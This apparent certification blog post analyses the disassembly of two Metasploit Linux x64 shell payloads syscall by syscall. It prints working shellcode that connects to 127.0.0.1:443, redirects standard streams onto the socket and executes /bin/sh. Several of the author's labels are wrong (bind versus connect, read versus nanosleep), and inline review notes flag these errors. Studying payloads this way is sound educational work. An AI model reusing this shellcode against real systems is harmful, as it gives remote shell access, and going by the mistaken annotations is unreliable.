SLAE64 #5 - MSF shellcode analysis

I will be analysing chunks of the linux/x64/meterpreter/bind_tcp and the linux/x64/shell_bind_tcp payloads and see how they differ. Although both are described as TCP bind shellcode, the primary difference between them is that the meterpreter shellcode is a staged payload while the other is a stageless payload. As such, the meterpreter shellcode expects the server to provide a second stage, while the other immediately returns a usable shell.

linux/x64/meterpreter/bind_tcp payload

0x400078        xor    %rdi,%rdi
0x40007b        pushq  $0x9
0x40007d        pop    %rax
0x40007e        cltd
0x40007f        mov    $0x10,%dh
0x400081        mov    %rdx,%rsi
0x400084        xor    %r9,%r9
0x400087        pushq  $0x22
0x400089        pop    %r10
0x40008b        mov    $0x7,%dl
0x40008d        syscall   

Register values: rax - 0x9, rsi - 0x1000, r10 - 0x22, rdx - 0x1007
sys_mmap call to allocate memory for the second stage payload: rdi = 0 (no address hint), rsi = 0x1000 bytes, rdx = 0x1007 whose low bits 0x7 are PROT_READ|PROT_WRITE|PROT_EXEC, r10 = 0x22 = MAP_PRIVATE|MAP_ANONYMOUS. An anonymous RWX mapping like this is a characteristic artefact of staged payloads.


0x40008f        test   %rax,%rax
0x400092        js     0x4000ef
0x400094        pushq  $0xa
0x400096        pop    %r9
0x400098        push   %rsi
0x400099        push   %rax
0x40009a        pushq  $0x29
0x40009c        pop    %rax
0x40009d        cltd
0x40009e        pushq  $0x2
0x4000a0        pop    %rdi
0x4000a1        pushq  $0x1
0x4000a3        pop    %rsi
0x4000a4        syscall

Register values: rax - 0x29, rcx - 0x40008f, rsi - 0x1, r10 - 0x22, rdi - 0x2, r9 - 0xa, r11 - 0x346   
sys_socket call to create a socket to bind to


0x4000a6        test   %rax,%rax 
0x4000a9        js     0x4000ef
0x4000ab        xchg   %rax,%rdi
0x4000ad        movabs $0x100007fbb010002,%rcx
0x4000b7        push   %rcx
0x4000b8        mov    %rsp,%rsi
0x4000bb        pushq  $0x10
0x4000bd        pop    %rdx
0x4000be        pushq  $0x2a
0x4000c0        pop    %rax
0x4000c1        syscall

Register values: rax - 0x2a, r10 - 0x22, rdx - 0x10, rdi - 0x3, r11 - 0x306   
sys_connect call to connect out to 127.0.0.1:443 (syscall 0x2a is connect(); a bind() would be 0x31, so the dumped sample behaves as a connect-back payload — the bind_tcp label may not match what was actually generated)
0x100007f - 127.0.0.1
0xbb01 - 443


0x4000c3        test   %rax,%rax
0x4000c6        jns    0x4000e3
0x4000c8        dec    %r9
0x4000cb        je     0x4000ef
0x4000cd        pushq  $0x23
0x4000cf        pop    %rax
0x4000d0        pushq  $0x0
0x4000d2        pushq  $0x5
0x4000d4        mov    %rsp,%rdi
0x4000d7        xor    %rsi,%rsi
0x4000da        syscall

Register values: rax - 0x0, rcx - 0x100007fbb010002, r10 - 0x22, rdx - 0x1000, r9 - 0x9, r11 - 0x306
sys_read to read second stage payload and write to allocated memory address at rcx. (Review note: on x86-64, syscall number 0x23 (35) is sys_nanosleep, not sys_read (0); the pushed 0x5 and 0x0 form a struct timespec {5, 0} at rdi, so this path looks like a 5-second delay before retrying the connect, with r9 counting down from 0xa as the retry limit and the je to 0x4000ef as the give-up path. rcx is not an argument to this syscall; the value shown is left over from the earlier movabs. The actual read of the stage is presumably on the jns path at 0x4000e3, which is not shown here.)

I was not able to proceed further without the correct payload; however, I believe the next step would be to read the second stage into the mmap'd region and jump to it for execution.
linux/x64/shell_bind_tcp payload

0x400078        pushq  $0x29
0x40007a        pop    %rax
0x40007b        cltd
0x40007c        pushq  $0x2
0x40007e        pop    %rdi
0x40007f        pushq  $0x1
0x400081        pop    %rsi
0x400082        syscall

Register values: rax - 0x29, rsi - 0x1
sys_socket call to create a socket to bind to


0x400084        xchg   %rax,%rdi
0x400086        movabs $0x100007fbb010002,%rcx
0x400090        push   %rcx
0x400091        mov    %rsp,%rsi
0x400094        pushq  $0x10
0x400096        pop    %rdx
0x400097        pushq  $0x2a
0x400099        pop    %rax
0x40009a        syscall

Register values: rax - 0x2a, rcx - 0x100007fbb010002, rdx - 0x10, rdi - 0x3, r11 - 0x302 
sys_connect call to connect out to 127.0.0.1:443 (syscall 0x2a is connect(), so like the sample above this is a connect-back rather than a listening bind)
0x100007f - 127.0.0.1
0xbb01 - 443   


0x40009c        pushq  $0x3
0x40009e        pop    %rsi
0x40009f        dec    %rsi
0x4000a2        pushq  $0x21
0x4000a4        pop    %rax
0x4000a5        syscall
0x4000a7        jne    0x40009f

Register values: rax - 0x21, rsi - 0x3 , 1 , 0, rdx - 0x10, rdi - 0x3, r11 - 0x302   
sys_dup2 to redirect STDERR, STDOUT and STDIN onto the socket fd (rdi = 0x3). The loop body runs three times with rsi = 2, 1, 0; JNE jumps back until the dec leaves rsi = 0x0.


0x4000a9        pushq  $0x3b
0x4000ab        pop    %rax
0x4000ac        cltd
0x4000ad        movabs $0x68732f6e69622f,%rbx
0x4000b7        push   %rbx
0x4000b8        mov    %rsp,%rdi
0x4000bb        push   %rdx
0x4000bc        push   %rdi
0x4000bd        mov    %rsp,%rsi
0x4000c0        syscall

Register values: rax - 0x3b , rbx - 0x68732f6e69622f

sys_execve call to run /bin/sh: rdi points at the "/bin/sh" string on the stack, rsi points at argv = {"/bin/sh", NULL} built by the push %rdx / push %rdi pair, and rdx = 0 (from cltd) gives a NULL envp.
0x68732f6e69622f - /bin/sh

This blog post has (not) been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE64-XXXXX